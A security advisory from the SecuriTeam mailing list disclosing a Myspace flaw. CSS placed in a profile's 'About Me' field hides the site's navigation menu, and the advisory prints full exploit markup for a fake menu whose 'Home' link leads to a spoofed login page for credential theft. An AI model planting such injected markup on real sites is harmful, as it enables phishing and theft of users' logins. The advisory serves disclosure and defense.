[NEWS] Myspace.com Trojaned Navigation Menu



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Myspace.com Trojaned Navigation Menu
------------------------------------------------------------------------


SUMMARY

Myspace.com provides a site navigation menu near the top of every page.
Users generally use this menu to navigate to the various areas of the
website. The first link that the menu provides is called "Home" which
navigates back to the user's personalized Myspace page which is
essentially the user's "home base" when using the site. As such this
particular link is used quite frequently and is used to return from other
areas of the website, most importantly from other user's profile pages.

A content-replacement attack coupled with a spoofed Myspace login page can
be used to collect victim users' authentication credentials. By replacing
the navigation menu on the attacker's Myspace profile page, an
unsuspecting victim may be redirected to an external site of the
attacker's choice, such as a spoofed Myspace login page. Due to
Myspace.com's seemingly random tendency to expire user sessions or log
users out, a user being presented with the Myspace login page is not out
of the ordinary and does not raise much suspicion on the part of the
victim.

DETAILS

Impact:
Users are unexpectedly redirected to a website of the attacker's choice.

Users may be tricked into revealing their authentication credentials.

Technical Explanation:
The following CSS code can be submitted to a user profile's "About Me"
section which will cause the Myspace navigation menu not to be displayed:

<style type="text/css">
div table td font {display: none;}
</style>

This allows the attacker to replace it with a malicious navigation menu
which may redirect users to an external site spoofing the Myspace login
page. If the user is successfully tricked into believing that they must
re-authenticate, they will inadvertently reveal their authentication
credentials to the attacker.

Solution & Recommendations:
Myspace should not allow users to add CSS code to their profiles via the
update profile form. This restriction can be accomplished by rejecting
such submissions or stripping the code out of the form input when
submitted.

Users should always be aware of the URL information in their browser.

As a temporary work-around, users should not use the navigation bars while
viewing an untrusted user's Myspace profile.

Exploitation:
Place this code in the "About Me" section of the attacker's Myspace
profile:

<style type="text/css">
div table td font {display: none;}
</style>

<div style="z-index:5; background-color:000000; position:absolute;
top:125px; left:50%; margin-left:-395px; width:790px; height:15px;"
align="center"><font color=><b></b></font><br>

<a href="http://www.example.com/login.html"; target=""><font
color=ffffff>Home</font></a>
<font color=ff0099> |</font>

<a href="http://browseusers.myspace.com/browse/browse.aspx?";
target=""><font color=ffffff>Browse</font></a>
<font color=ff0099> |</font>

<a href="http://search.myspace.com/index.cfm?fuseaction=find";
target=""><font color=ffffff>Search</font></a>
<font color=ff0099> |</font>

<a href="http://invite.myspace.com/index.cfm?fuseaction=invite";
target=""><font color=ffffff>Invite</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=film"; target=""><font
color=ffffff>Film</font></a>
<font color=ff0099> |</font>

<a href="http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox";
target=""><font color=ffffff>Mail</font></a>
<font color=ff0099> |</font>

<a href="http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter";
target=""><font color=ffffff>Blog</font></a>
<font color=ff0099> |</font>

<a href="http://favorites.myspace.com/index.cfm?fuseaction=user.favorites";
target=""><font color=ffffff>Favorites</font></a>
<font color=ff0099> |</font>

<a
href="http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories"; target=""><font color=ffffff>Forum</font></a>
<font color=ff0099> |</font>

<a href="http://groups.myspace.com/index.cfm?fuseaction=groups.categories";
target=""><font color=ffffff>Groups</font></a>
<font color=ff0099> |</font>

<a href="http://events.myspace.com/index.cfm?fuseaction=events";
target=""><font color=ffffff>Events</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=vids"; target=""><font
color=ffffff>Videos</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=music";
target=""><font color=ffffff>Music</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=comedian.home";
target=""><font color=ffffff>Comedy</font></a>
<font color=ff0099> |</font>

<a href="http://classifieds.myspace.com/index.cfm?fuseaction=classifieds";
target=""><font color=ffffff>Classifieds</font></a>
</div><style type="text/css">div div table tr td a.navbar, div div table
tr td font {display: none;}</style>


ADDITIONAL INFORMATION

The information has been provided by <mailto:int3l@xxxxxxxxxx> int3l.
The original article can be found at:
<http://www.caughq.org/advisories/CAU-2006-0001.txt>
http://www.caughq.org/advisories/CAU-2006-0001.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.